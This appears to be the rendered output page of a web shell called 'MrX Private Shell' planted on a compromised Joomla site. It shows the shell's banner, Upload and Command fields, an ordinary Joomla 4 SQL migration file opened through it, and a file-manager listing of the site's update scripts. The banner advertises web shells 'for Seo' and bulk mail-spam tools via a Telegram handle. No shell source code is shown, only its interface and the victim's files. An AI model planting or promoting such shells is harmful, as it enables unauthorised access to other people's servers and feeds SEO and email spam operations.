__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
--
-- Fix wrong asset name for com_content basic workflow stage if a new asset with the right
-- name hasn't been created yet when saving the workflow stage in backend in past.
--
UPDATE `#__assets`
   SET `name` = 'com_content.stage.1'
 WHERE `name` = 'com_content.state.1'
   AND (SELECT c.`count` FROM (SELECT COUNT(b.`id`) AS `count` FROM `#__assets` b WHERE b.`name` = 'com_content.stage.1') AS c) = 0;

--
-- Fix wrong asset titles for workflow transitions
--
UPDATE `#__assets` SET `title` = 'Unpublish' WHERE `name` = 'com_content.transition.1' AND `title` = 'Publish';
UPDATE `#__assets` SET `title` = 'Publish'   WHERE `name` = 'com_content.transition.2' AND `title` = 'Unpublish';
UPDATE `#__assets` SET `title` = 'Trash'     WHERE `name` = 'com_content.transition.3' AND `title` = 'Archive';
UPDATE `#__assets` SET `title` = 'Archive'   WHERE `name` = 'com_content.transition.4' AND `title` = 'Trash';

--
-- Set asset ID of com_content basic workflow stage to the right value if not already set.
-- The right value is either the asset fixed with the first update statement at the top
-- of this file or a new asset which has been created yet when saving the workflow stage
-- in backend in past.
--
UPDATE `#__workflow_stages` s
 INNER JOIN (SELECT `name`, MAX(`id`) AS `id` FROM `#__assets` GROUP BY `name`) AS a ON a.`name` = CONCAT('com_content.stage.', s.`id`)
   SET s.`asset_id` = a.`id`
 WHERE s.`id` = 1
   AND s.`asset_id` = 0;

Filemanager

Name Type Size Permission Actions
4.0.0-2018-03-05.sql File 6.73 KB 0664
4.0.0-2018-05-15.sql File 6.22 KB 0664
4.0.0-2018-07-19.sql File 1.7 KB 0664
4.0.0-2018-07-29.sql File 13.01 KB 0664
4.0.0-2018-08-29.sql File 1.45 KB 0664
4.0.0-2019-03-09.sql File 2.91 KB 0664
4.0.0-2019-03-30.sql File 483 B 0664
4.0.0-2019-04-15.sql File 899 B 0664
4.0.0-2019-04-22.sql File 1.71 KB 0664
4.0.0-2019-05-20.sql File 1.74 KB 0664
4.0.0-2019-06-29.sql File 3.69 KB 0664
4.0.0-2019-07-13.sql File 13.3 KB 0664
4.0.0-2019-09-13.sql File 3.99 KB 0664
4.0.0-2019-09-22.sql File 1.75 KB 0664
4.0.0-2019-10-06.sql File 6.48 KB 0664
4.0.0-2019-10-17.sql File 962 B 0664
4.0.0-2020-02-02.sql File 1.78 KB 0664
4.0.0-2020-03-10.sql File 1.38 KB 0664
4.0.0-2020-03-25.sql File 6.07 KB 0664
4.0.0-2020-05-29.sql File 5.43 KB 0664
4.0.0-2020-09-27.sql File 1.41 KB 0664
4.0.0-2020-12-20.sql File 6.13 KB 0664
4.0.0-2021-04-22.sql File 1.37 KB 0664
4.0.0-2021-04-27.sql File 1.95 KB 0664
4.0.0-2021-05-30.sql File 1.58 KB 0664
4.0.0-2021-06-04.sql File 226 B 0664
4.0.0-2021-08-13.sql File 1.42 KB 0664
4.0.0-2021-08-17.sql File 1.18 KB 0664
4.0.3-2021-09-04.sql File 1.88 KB 0664
4.0.3-2021-09-05.sql File 607 B 0664
4.0.6-2021-12-23.sql File 125 B 0664
4.1.0-2021-11-20.sql File 4.44 KB 0664
4.1.0-2021-11-28.sql File 429 B 0664
4.1.0-2021-12-29.sql File 329 B 0664
4.1.0-2022-01-08.sql File 205 B 0664
4.1.0-2022-01-19.sql File 337 B 0664
4.1.0-2022-01-24.sql File 338 B 0664
4.1.1-2022-02-20.sql File 106 B 0664
4.1.3-2022-04-07.sql File 486 B 0664
4.1.3-2022-04-08.sql File 124 B 0664
4.2.0-2022-05-15.sql File 3 KB 0664
4.2.0-2022-06-15.sql File 180 B 0664
4.2.0-2022-06-19.sql File 356 B 0664
4.2.0-2022-06-22.sql File 295 B 0664
4.2.0-2022-07-07.sql File 474 B 0664
4.2.1-2022-08-23.sql File 255 B 0664
4.2.3-2022-09-07.sql File 217 B 0664
4.2.7-2022-12-29.sql File 534 B 0664
index.html File 31 B 0664
Filemanager